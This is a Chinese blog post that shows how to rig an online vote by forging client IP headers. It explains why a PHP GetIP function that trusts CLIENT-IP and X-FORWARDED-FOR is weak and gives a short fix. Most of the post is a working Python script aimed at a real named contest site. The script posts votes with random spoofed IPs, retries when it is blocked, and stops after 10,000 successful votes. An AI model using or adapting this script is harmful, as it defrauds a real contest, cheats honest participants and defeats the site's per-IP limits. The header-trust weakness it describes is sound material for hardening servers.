Fork me on GitHub

python投票和ip地址的伪造


全怪我们太穷了,又不认识人。

项目说明

php获取IP问题

一般我们写的获取ip的方式:

1
2
3
4
5
6
7
8
9
10
11
12
function GetIP(){
if (!empty($_SERVER["HTTP_CLIENT_IP"])) {
$cip = $_SERVER["HTTP_CLIENT_IP"];
} elseif (!empty($_SERVER["HTTP_X_FORWARDED_FOR"])) {
$cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
} elseif (!empty($_SERVER["REMOTE_ADDR"])) {
$cip = $_SERVER["REMOTE_ADDR"];
} else {
$cip = "0.0.0.0";
}
return $cip;
}

其实这是有问题的,通过header我们可以轻易改变ip:

1
2
3
4
5
6
7
8
9
10
11
12
13
$curl = curl_init();    //初始化一个curl对象  
curl_setopt($curl, CURLOPT_URL, "127.0.0.1/server.php");
$header = array( //构造头部
'CLIENT-IP:58.68.44.61',
'X-FORWARDED-FOR:58.68.44.61',
);

curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);

$str = curl_exec($curl); //执行请求
curl_close($curl); //关闭c
echo $str; //输出抓取的结果

解决方法:
在判断的时候以$_SERVER["REMOTE_ADDR"]优先。

python脚本

初学,不喜勿喷

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
import threading
import random
import socket
import struct
import requests
import json
import time

url = 'http://kepudasai.cdstm.cn/index.php?kepu-postvote'

data = {'group': 'gaozhongzu','key' : 10}

def createHeader():
ip = socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff)))
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0',
'CLIENT-IP': ip,
'X-FORWARDED-FOR': ip
}
return headers

def toupiao():
index = 0
headers = createHeader();
while True:
html = requests.post(url, data=data, headers=headers)
result = json.loads(html.text)
if(result['error'] == 1):
time.sleep(random.randint(1, 3))
headers = createHeader();
else:
index += 1
if(index == 10000):
print index
break

toupiao()

请我喝一个苹果味的美年达吧,谢谢!